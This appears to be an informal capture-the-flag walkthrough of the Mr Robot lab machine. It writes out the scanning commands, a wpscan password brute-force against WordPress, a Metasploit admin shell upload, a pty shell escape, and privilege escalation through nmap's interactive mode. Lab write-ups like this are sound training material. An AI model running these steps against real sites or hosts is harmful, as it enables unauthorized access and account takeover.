Before we begin we should see Mr Robot series … just kidding but I saw it and I know mr root name which I used it for this host
Lets start Scanning the host with nmap :
Nmap –A –T4 –p- 192.168.1.20 –v

Dirb gave us a lot of results :

What is interesting is the robots.txt file

Opening the key-1-of-3.txt gave us a MD5 hash : 073403c8a58a1f80d943455fb30724b9

The other file is fsocity.dic is a dictionary file with big password list

Nikto shows that the host is running WordPress service


So now we can use WPSCAN with the word list we found, I used mrrobot as username but nothing came up then I used Elliot as the user name and it came with a password , the file is too big so lets reduce it a lil:
sort fsocity.dic | uniq > pass.txt
wpscan –url http://192.168.1.20 -P /root/Downloads/pass.txt -U elliot -t 100

now lets try logging to the WordPress page using these credentials:now lets try logging to the WordPress page using these credentials:

Now we can use metasploit and upload a shell to the host :
We going to use exploit unix/webapp/wp_admin_shell_upload
And set the WPCHECK false or it wont work (had to google it to figure it out)


Viewing the password.raw-md5 we get a MD5 hash decoding it will give us :abcdefghijklmnopqrstuvwxyz
After we escape the sell by echo “import pty; pty.spawn(‘/bin/bash’)” we need to su – robot to switch to robot account and use the password we got

And then we can now view the other file key-2-0f-3.txt

We got a new hash and its useless
It took some time with privilege escalation till I found that the system is using namp and I can run it as nmap –interactive
And then simply !sh
